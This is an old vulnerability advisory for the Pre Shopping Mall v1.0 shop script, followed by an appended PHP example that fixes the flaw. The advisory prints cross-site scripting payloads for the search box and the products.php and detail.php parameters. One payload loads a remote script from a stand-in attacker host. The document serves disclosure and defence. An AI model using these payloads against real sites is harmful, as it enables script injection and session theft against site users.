Pre Shopping Mall v1.0

2006-05-30 / 2006-05-31
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Pre Shopping Mall

Homepage:
http://www.preprojects.com/emall.asp

Description:
PRE SHOPPING MALL is a powerful ecommerce shopping mall solution. If you need to set up an online shop or shopping mall, PRE SHOPPING MALL is your quickest solution. You can set up your Emall within a few hours. Buy, install and start selling your products. Very easy to install and manage, with powerful administration. Receive payments through either Paypal or Authorize.net. Quickest solution for your online business.

Affected files:
search box
detail.php
products.php

Exploits & Vulns:

XSS Vulnerabilities:
The search and login box does not sanitize user input before writing it into the dynamically generated page. This could cause XSS. For proof of concept, just try putting this in the search box:

'';!--"<XSS>=&{()}'';!--"<XSS>=&{()}<SCRIPT SRC=http://www.evilcode.com/xss.js></SCRIPT>'';!--"<XSS>=&{()}'';!--" <XSS>=&{()}

More XSS Vulns:
For the XSS examples we'll use URL injection with the tag:

<IMG%20SRC=javascript:alert('XSS')>

http://www.example.com/emall/products.php?cid=[XSS]
http://www.example.com/emall/detail.php?prodid=[XSS]
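One way to close both issues described above, as an added example that is not part of the advisory or the vendor's code: the function names, the `q` search field and the assumption that `cid` and `prodid` are positive integer ids are hypothetical.

```php
<?php
// Added example: hypothetical handlers, not Pre Shopping Mall source code.

// Assumption: cid and prodid are positive integer record ids, so they are
// validated by type rather than filtered for markup.
function read_id(array $query, string $name): ?int
{
    $id = filter_var($query[$name] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Free-text input cannot be type-checked; encode it for the HTML context it
// is written into. ENT_QUOTES covers both quote styles in attribute values.
function h(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Search box: the term is echoed back in an attribute and in element text.
function render_search(array $query): string
{
    $raw  = $query['q'] ?? '';                 // 'q' is an assumed field name
    $term = is_string($raw) ? $raw : '';       // q[]=... arrives as an array
    return '<input type="text" name="q" value="' . h($term) . '">' . "\n"
         . '<p>Results for: ' . h($term) . '</p>';
}

// products.php / detail.php: reject anything that is not a plain id.
function render_listing(array $query, string $param): string
{
    $id = read_id($query, $param);
    if ($id === null) {
        return 'HTTP 400: invalid ' . h($param);
    }
    return '<a href="detail.php?prodid=' . $id . '">Item ' . $id . '</a>';
}

// Constructed requests reusing the advisory's proof-of-concept tag.
$poc = "<IMG SRC=javascript:alert('XSS')>";
echo render_listing(['cid' => $poc], 'cid'), "\n";
echo render_listing(['prodid' => '42'], 'prodid'), "\n";
echo render_search(['q' => $poc]), "\n";
echo render_search(['q' => ['nested']]), "\n";
```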

